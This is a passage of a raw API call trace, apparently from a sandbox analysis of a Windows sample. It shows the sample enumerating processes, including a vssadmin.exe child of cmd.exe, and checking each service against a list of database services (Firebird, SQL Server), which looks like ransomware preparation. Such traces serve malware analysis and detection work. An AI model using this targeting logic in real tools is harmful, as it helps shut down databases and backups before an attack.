szExeFile="cats-exceed-photo.exe")) returned 1 [0034.550] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0034.550] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0034.551] lstrlenW (lpString="medical lectures.exe") returned 20 [0034.551] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0034.551] lstrlenW (lpString="electronic.exe") returned 14 [0034.551] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0034.552] lstrlenW (lpString="regression.exe") returned 14 [0034.552] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0034.553] lstrlenW (lpString="county.exe") returned 10 [0034.553] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0034.553] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0034.553] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0034.554] lstrlenW (lpString="dllhost.exe") returned 11 [0034.554] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0034.555] lstrlenW (lpString="dllhost.exe") returned 11 [0034.555] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0034.568] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0034.568] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0034.569] lstrlenW (lpString="cmd.exe") returned 7 [0034.569] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0034.570] lstrlenW (lpString="conhost.exe") returned 11 [0034.570] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0034.571] lstrlenW (lpString="vssadmin.exe") returned 12 [0034.571] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0034.571] CloseHandle (hObject=0x164) returned 1 [0034.572] Sleep (dwMilliseconds=0x1f4) [0035.385] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb90428 [0035.386] EnumServicesStatusExW (in: hSCManager=0xb90428, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0035.386] GetLastError () returned 0xea [0035.386] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x123e) returned 0x42a8920 [0035.386] EnumServicesStatusExW (in: hSCManager=0xb90428, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x42a8920, cbBufSize=0x123e, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x42a8920, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0035.387] CloseServiceHandle (hSCObject=0xb90428) returned 1 [0035.387] lstrlenW (lpString="Appinfo") returned 7 [0035.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0035.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0035.387] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0035.387] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0035.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0035.387] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0035.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0035.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0035.387] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0035.387] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0035.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0035.387] lstrlenW (lpString="AudioSrv") returned 8 [0035.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0035.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0035.387] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0035.387] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0035.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0035.387] lstrlenW (lpString="BFE") returned 3 [0035.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0035.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0035.387] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0035.387] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0035.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0035.388] lstrlenW (lpString="CryptSvc") returned 8 [0035.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0035.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0035.388] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0035.388] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0035.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0035.388] lstrlenW (lpString="CscService") returned 10 [0035.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0035.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0035.388] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0035.388] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0035.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0035.388] lstrlenW (lpString="DcomLaunch") returned 10 [0035.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0035.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0035.388] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0035.388] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0035.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0035.388] lstrlenW (lpString="Dhcp") returned 4 [0035.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0035.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0035.388] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0035.388] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0035.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0035.388] lstrlenW (lpString="Dnscache") returned 8 [0035.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0035.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0035.388] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0035.388] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0035.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0035.388] lstrlenW (lpString="DPS") returned 3 [0035.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0035.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0035.389] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0035.389] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0035.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0035.389] lstrlenW (lpString="eventlog") returned 8 [0035.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0035.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0035.389] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0035.389] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0035.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0035.389] lstrlenW (lpString="EventSystem") returned 11 [0035.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0035.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0035.389] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0035.389] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0035.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0035.389] lstrlenW (lpString="gpsvc") returned 5 [0035.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0035.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0035.389] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0035.389] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0035.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0035.389] lstrlenW (lpString="iphlpsvc") returned 8 [0035.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0035.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0035.389] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0035.389] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0035.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0035.389] lstrlenW (lpString="LanmanServer") returned 12 [0035.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0035.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0035.390] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0035.390] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0035.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0035.390] lstrlenW (lpString="LanmanWorkstation") returned 17 [0035.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0035.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0035.390] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0035.390] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0035.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0035.390] lstrlenW (lpString="lmhosts") returned 7 [0035.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0035.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0035.390] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0035.390] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0035.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0035.390] lstrlenW (lpString="MMCSS") returned 5 [0035.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0035.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0035.390] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0035.390] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0035.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0035.390] lstrlenW (lpString="MpsSvc") returned 6 [0035.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0035.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0035.390] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0035.390] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0035.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0035.390] lstrlenW (lpString="Netman") returned 6 [0035.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0035.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0035.390] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0035.391] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0035.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0035.391] lstrlenW (lpString="netprofm") returned 8 [0035.391] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0035.391] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0035.391] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0035.391] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0035.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0035.391] lstrlenW (lpString="NlaSvc") returned 6 [0035.391] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0035.391] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0035.391] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0035.391] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0035.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0035.391] lstrlenW (lpString="nsi") returned 3 [0035.391] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0035.391] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0035.391] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0035.391] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0035.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0035.391] lstrlenW (lpString="PcaSvc") returned 6 [0035.391] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0035.391] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0035.391] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0035.391] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0035.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0035.391] lstrlenW (lpString="PlugPlay") returned 8 [0035.391] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0035.391] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0035.391] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0035.391] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0035.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0035.392] lstrlenW (lpString="Power") returned 5 [0035.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0035.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0035.392] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0035.392] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0035.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0035.392] lstrlenW (lpString="ProfSvc") returned 7 [0035.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0035.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0035.392] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0035.392] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0035.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0035.392] lstrlenW (lpString="RpcEptMapper") returned 12 [0035.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0035.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0035.392] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0035.392] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0035.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0035.392] lstrlenW (lpString="RpcSs") returned 5 [0035.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0035.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0035.392] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0035.392] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0035.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0035.392] lstrlenW (lpString="SamSs") returned 5 [0035.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0035.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0035.392] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0035.392] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0035.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0035.392] lstrlenW (lpString="Schedule") returned 8 [0035.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0035.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0035.393] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0035.393] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0035.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0035.393] lstrlenW (lpString="SENS") returned 4 [0035.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0035.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0035.393] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0035.393] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0035.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0035.393] lstrlenW (lpString="ShellHWDetection") returned 16 [0035.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0035.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0035.393] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0035.393] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0035.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0035.393] lstrlenW (lpString="Spooler") returned 7 [0035.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0035.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0035.393] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0035.393] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0035.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0035.393] lstrlenW (lpString="SysMain") returned 7 [0035.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0035.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0035.393] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0035.393] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0035.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0035.393] lstrlenW (lpString="Themes") returned 6 [0035.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0035.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0035.393] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0035.394] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0035.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0035.394] lstrlenW (lpString="TrkWks") returned 6 [0035.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0035.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0035.394] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0035.394] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0035.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0035.394] lstrlenW (lpString="UxSms") returned 5 [0035.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0035.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0035.394] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0035.394] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0035.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0035.394] lstrlenW (lpString="VSS") returned 3 [0035.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0035.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0035.394] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0035.394] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0035.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0035.394] lstrlenW (lpString="WdiServiceHost") returned 14 [0035.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0035.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0035.394] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0035.394] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0035.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0035.394] lstrlenW (lpString="WdiSystemHost") returned 13 [0035.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0035.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0035.394] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0035.394] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0035.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0035.395] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0035.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0035.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0035.395] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0035.395] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0035.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0035.395] lstrlenW (lpString="Winmgmt") returned 7 [0035.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0035.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0035.395] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0035.395] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0035.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0035.395] lstrlenW (lpString="WPDBusEnum") returned 10 [0035.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0035.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0035.395] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0035.395] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0035.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0035.395] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42a8920 | out: hHeap=0xb10000) returned 1 [0035.395] CreateToolhelp32Snapshot 